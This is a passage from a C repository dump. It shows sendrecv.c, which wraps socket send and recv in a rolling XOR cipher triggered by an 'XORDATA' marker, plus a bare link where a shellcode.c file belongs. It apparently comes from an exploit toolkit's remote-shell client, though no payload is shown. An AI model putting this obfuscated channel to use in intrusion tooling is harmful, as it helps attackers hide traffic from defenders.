16 | 	strout(buff);
17 | } 


--------------------------------------------------------------------------------
/include/sendrecv.c:
--------------------------------------------------------------------------------
 1 | 
 2 | int newrecv(int fd,char *buff,int size,int flag){
 3 |     
 4 | 	int i,k;
 5 | 	k=recv(fd,buff,size,flag); 
 6 |     if(k==0||k<0)
 7 | 	{
 8 | 
 9 | 		 i=WSAGetLastError();
10 | 		 if(k==0||i==0x2746||i==0x2745)
11 | 		 {
12 |             strout("\r\n\r\nServer close!\r\n");
13 | 			Sleep(1000);
14 | 			exit(1);  
15 |          }
16 | 	}
17 | 
18 |     if(xordatabegin==1){
19 | 			  for(i=0;i<k;++i){
20 |                 lockintvar1=lockintvar1*0x100;
21 | 				lockintvar1=lockintvar1%LOCKBIGNUM;
22 | 				lockcharvar=lockintvar1%0x100;
23 |                 buff[i]^=lockcharvar;   // DATAXORCODE;
24 | 			  }
25 |     
26 | 	}
27 | 	else{
28 | 		if(k>0){
29 | 			buff[k]=0;
30 | 			if(strstr(buff,"XORDATA")!=0) {
31 | 		      xordatabegin=1;
32 | 			  i=strstr(buff,"XORDATA");
33 |               memcpy(i,"\r\nok!!\r\n",8);
34 |               for(i=strstr(buff,"\r\nok!!\r\n")-buff+8;i<k;++i)
35 | 			  {
36 |                 lockintvar1=lockintvar1*0x100;
37 | 				lockintvar1=lockintvar1%LOCKBIGNUM;
38 | 				lockcharvar=lockintvar1%0x100;
39 |                 buff[i]^=lockcharvar;   // DATAXORCODE;
40 | 			  }
41 | 			}
42 |          }
43 | 			
44 | 	}
45 |     return(k);
46 | 
47 | 
48 | }
49 | 
50 | int newsend(int fd,char *buff,int size,int flag){
51 |           int i;
52 | 	
53 |           for(i=0;i<size;++i){
54 |                 lockintvar2=lockintvar2*0x100;
55 | 				lockintvar2=lockintvar2%LOCKBIGNUM;
56 | 				lockcharvar=lockintvar2%0x100;
57 |                 buff[i]^=lockcharvar;   // DATAXORCODE;
58 |   //              buff[i]^=DATAXORCODE;
59 | 		  }
60 | 
61 |       return(send(fd,buff,size,flag));   
62 | 
63 | }
64 | 
65 | 
66 | 


--------------------------------------------------------------------------------
/include/shellcode.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yuange75/aspcode/63ee018cd3a70e4bc4b7274f83e5d1c1cfc87d91/include/shellcode.c


--------------------------------------------------------------------------------